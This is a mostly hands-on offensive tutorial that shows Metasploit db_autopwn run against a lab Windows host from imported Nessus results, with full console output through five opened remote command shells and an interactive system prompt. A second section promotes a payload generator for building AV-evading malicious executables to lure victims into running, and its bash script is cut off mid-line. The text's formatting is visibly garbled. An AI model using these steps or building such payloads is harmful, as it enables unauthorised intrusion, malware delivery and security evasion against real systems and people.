The Art of Grey-Box Attack (2)

[0x03b]-Nessus + Metasploit Autopwned
++

First, you must use Nessus plugin for VA and export file with *. nbe, then import to metasploit framework for autopwn

[Import Nessus (nbe) result to Metasploit] -------------------------------------------------------

Bt framework3 # msfconsole

###################################
################
#######################
#####################
##############
############################

= [Msf v3.3-dev
+ -- = [288 exploits-124 payloads
+ -- = [17 encoders-6 nops
= [56 aux

Msf & gt; load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
Msf & gt; db_create/tmp/ness. db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File:/tmp/ness. db
Msf & gt; db_import_nessus_nbe/root/demo. nbe
Msf & gt; db_hosts
[*] Time: Fri Jul 03 14:43:58 + 0000 2009 Host: 192.168.80.129 Status: alive OS:
Msf & gt; db_autopwn-x-t
[*] Analysis completed in 4.28915095329285 seconds (17 vulns/1145 refs)
[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.80.129: 445...
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129: 135...
[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.80.129: 445...
[*] Matched exploit/windows/mssql/ms02_039_slammer against 192.168.80.129: 1434...
[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.80.129: 445...
[*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.80.129: 445...
Msf & gt; db_autopwn-x-e
[*] (2/6): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129: 135...
[*] (3/6): Launching exploit/windows/smb/ms06_040_netapi against 192.168.80.129: 445...

[*] Started bind handler
[*] (4/6): Launching exploit/windows/mssql/ms02_039_slammer against 192.168.80.129: 1434...
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57: 0.0 @ ncacn_ip_tcp: 192.168.80.129 [135]...
[*] (5/6): Launching exploit/windows/smb/ms05_039_pnp against 192.168.80.129: 445...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57: 0.0 @ ncacn_ip_tcp: 192.168.80.129 [135]...
[*] Started bind handler
[*] (6/6): Launching exploit/windows/smb/ms04_011_lsass against 192.168.80.129: 445...
[*] Sending UDP packet with return address 0x42b48774
[*] Execute net start sqlserveragent once access is obtained
[*] Started bind handler
[*] Connecting to the SMB service...
[*] Sending exploit...
Msf & gt;
[*] Detected a Windows 2000 target
[*] Binding to 4b324fc8-1670-01d3-4268-5a47bf6ee188: 3.0 @ ncacn_np: 192.168.80.129 [BROWSER]...
[*] Started bind handler
[*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b: 1.0 @ ncacn_np: 192.168.80.129 [rowser]...
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened (192.168.80.131: 41655-& gt; 192.168.80.129: 39354)
[*] Command shell session 2 opened (192.168.80.131: 57118-& gt; 192.168.80.129: 7605)
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5: 0.0 @ ncacn_np: 192.168.80.129 [lsarpc]...
[*] Bound to 4b324fc8-1670-01d3-4268-5a47bf6ee188: 3.0 @ ncacn_np: 192.168.80.129 [BROWSER]...
[*] Building the stub data...
[*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b: 1.0 @ ncacn_np: 192.168.80.129 [rowser]...
[*] Calling the vulnerable function...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5: 0.0 @ ncacn_np: 192.168.80.129 [lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.0
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 3 opened (192.168.80.131: 50407-& gt; 192.168.80.129: 15299)
[*] Command shell session 4 opened (192.168.80.131: 32768-& gt; 192.168.80.129: 30092)
[*] The DCERPC service did not reply to our request
[*] Command shell session 5 opened (192.168.80.131: 39556-& gt; 192.168.80.129: 17330)
Sessions-l

Active sessions
====================

Id Description Tunnel
-------------------
1 Command shell 192.168.80.131: 41655-& gt; 192.168.80.129: 39354
2 Command shell 192.168.80.131: 57118-& gt; 192.168.80.129: 7605
3 Command shell 192.168.80.131: 50407-& gt; 192.168.80.129: 15299
4 Command shell 192.168.80.131: 32768-& gt; 192.168.80.129: 30092
5 Command shell 192.168.80.131: 39556-& gt; 192.168.80.129: 17330

Msf & gt; sessions-I 3
[*] Starting interaction with 3...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C: WINNTsystem32 & gt; ipconfig
Ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix.: localdomain
IP Address ......: 192.168.80.129
Subnet Mask ......: 255.255.255.0
Default Gateway ......: 192.168.80.2

C: WINNTsystem32 & gt;

[End Result] Begin

######################################## #####
[0x04]-Client-Side Attack with Metasploit
######################################## #####

++
[0x04a]-Metasploit Payload Generator
++

Metasploit Payload Generator is a tool allowing you to create malicious code easily.
This is not a tool to exploit a system. You can use the tool to create malicous payload and
Save it to exe file then you need to lure a victim to execute that file on his/her machine.

There is a feature to encode your payload to get past most AV and IDS/IPS (13 Encoding Choices ).
So we can use Metasploit Payload Generator from "Fast-Track". If you dont have "fast-track", you need
Metasploit framework and this script for you ;)

[Metascript] metadata

#! /Bin/bash
Echo "###################################### #####"
Echo "#### 0-Days Exploits with MetaCompiler ####"
Echo "###################################### #####"
Echo ""
Echo-n "Enter your Listener IP Address :"
Read ip
Echo-n "Enter your Listener Port :"
Read port
Echo ""
Echo "-= MetaCompiler Payloads = -"
Echo ""
Echo "++"
Echo "+ Meterpreter Re